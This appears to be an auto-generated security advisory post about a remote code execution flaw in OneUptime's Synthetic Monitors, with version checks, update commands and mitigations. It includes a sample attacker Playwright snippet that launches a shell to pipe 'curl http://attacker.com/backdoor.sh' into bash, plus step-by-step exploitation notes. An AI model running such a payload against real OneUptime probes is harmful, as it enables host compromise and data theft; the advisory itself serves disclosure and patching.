Listen to this Post
How This CVE Works
OneUptime versions before 10.0.20 contain a critical Remote Code Execution vulnerability in their Synthetic Monitors feature . Low-privileged project users can submit custom Playwright code that executes on the oneuptime-probe service . The untrusted code runs inside Node’s virtual machine (vm) context but is given live host Playwright objects including browser and page . This creates a unique server-side RCE primitive where attackers don’t need traditional sandbox escape techniques like `this.constructor.constructor(…)` . Instead, attackers directly use the injected Playwright browser object to call `browser.browserType().launch(…)` . This method spawns arbitrary executables on the probe host or container . The vulnerability stems from exposing dangerous host capabilities rather than prototype-chain access . Any OneUptime deployment where an attacker can gain ordinary project membership is at risk . The vulnerability carries a CVSS score of 9.9 (Critical) with vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H . It is classified under CWE-749 . The vulnerability was publicly disclosed on March 10, 2026 . The fix is implemented in version 10.0.20 .
dailycve form
Platform: OneUptime
Version: <10.0.20
Vulnerability: RCE
Severity: Critical
Date: 2026-03-10
Prediction: Patch available
What Undercode Say:
Analytics
- CVSS Score: 9.9 Critical
- Attack Vector: Network
- Complexity: Low
- Privileges Required: Low
- User Interaction: None
- Scope: Changed
- CWE: 749
- EPSS: 0.01% probability
Bash Commands and Codes
Check current version:
Check OneUptime package version npm list @oneuptime/common Or check package.json cat package.json | grep oneuptime
Malicious Playwright code example:
// Attacker-submitted code to exploit CVE-2026-30921
const { browser } = await import('playwright');
// Direct access to browser object injected by vulnerable vm context
browser.browserType().launch({
executablePath: '/bin/sh',
args: ['-c', 'curl http://attacker.com/backdoor.sh | bash']
});
Update to patched version:
Update to secure version npm install @oneuptime/[email protected] For Docker deployments docker pull oneuptime/probe:10.0.20 docker-compose up -d
How Exploit
1. Attacker gains low-privileged project access
2. Creates synthetic monitor with custom Playwright code
- Code runs in vm context with exposed browser object
4. Calls `browser.browserType().launch()`
5. Specifies arbitrary executable path
6. Executes commands on probe host/container
Protection from this CVE
- Update to OneUptime version 10.0.20 immediately
- Review and restrict project membership access
- Monitor for suspicious synthetic monitor creations
- Use package-lock.json scanning tools to detect vulnerable versions
Impact
- Full remote code execution on probe service
- Complete host/container compromise
- Data theft potential
- Internal network pivoting capability
- All OneUptime instances pre-10.0.20 vulnerable
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

